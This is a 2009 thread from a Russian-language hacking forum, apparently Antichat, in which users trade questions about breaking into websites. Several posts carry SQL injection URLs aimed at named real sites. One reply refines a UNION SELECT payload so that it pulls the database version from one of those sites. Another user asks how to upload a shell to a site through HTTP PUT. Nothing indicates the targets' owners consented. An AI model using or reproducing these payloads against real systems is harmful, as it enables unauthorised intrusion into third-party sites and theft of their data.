 |
|
19.02.2009, 12:32
|
|
Участник форума
Регистрация: 02.01.2008
Сообщений: 116
С нами:
9660739
Репутация:
58
|
|
когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.
что то можна зделать?
|
|
|
19.02.2009, 12:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от D1mka
когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.
что то можна зделать?
установить необходимые права и спать спокойно.
|
|
|
|
19.02.2009, 15:26
|
|
Новичок
Регистрация: 10.03.2008
Сообщений: 27
С нами:
9562916
Репутация:
1
|
|
Можно ли провернуть SQL injection при ошибке следующего вида:
http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql'
Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей--
А в данном случае, не пойму как это заюзать.
|
|
|
|
19.02.2009, 15:32
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
А с чего ты взял, что оно там есть и что оно не пофиксено?
|
|
|
|
19.02.2009, 15:37
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
|
|
|
|
19.02.2009, 15:41
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
Сообщение от Assembler
http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
http://www.sovtest.ru/news.php?id=99999+union+select+1,unhex(hex(version ())),3,4,5,6,7,8--
|
|
|
|
19.02.2009, 15:43
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
|
|
|
|
19.02.2009, 15:47
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
Сообщение от Assembler
aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
p.s: пробелы удали =\
|
|
|
|
19.02.2009, 18:49
|
|
Познающий
Регистрация: 09.05.2008
Сообщений: 95
С нами:
9476363
Репутация:
86
|
|
Мм... Дайте почитать что-нибудь о PUT, TRACE и WRITE методах.
Или подскажите... Есть сайт, у него корень со всеми этими параметрами... Как мне загрузить туда шелл, etc.?
Спасибо...
|
|
|
|
19.02.2009, 18:53
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
Ты считаешь это вопрос по уязвимостям?
ГУГЛ:
RFC 2068
http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt
Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
Жмах
Последний раз редактировалось jokester; 19.02.2009 в 19:00..
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
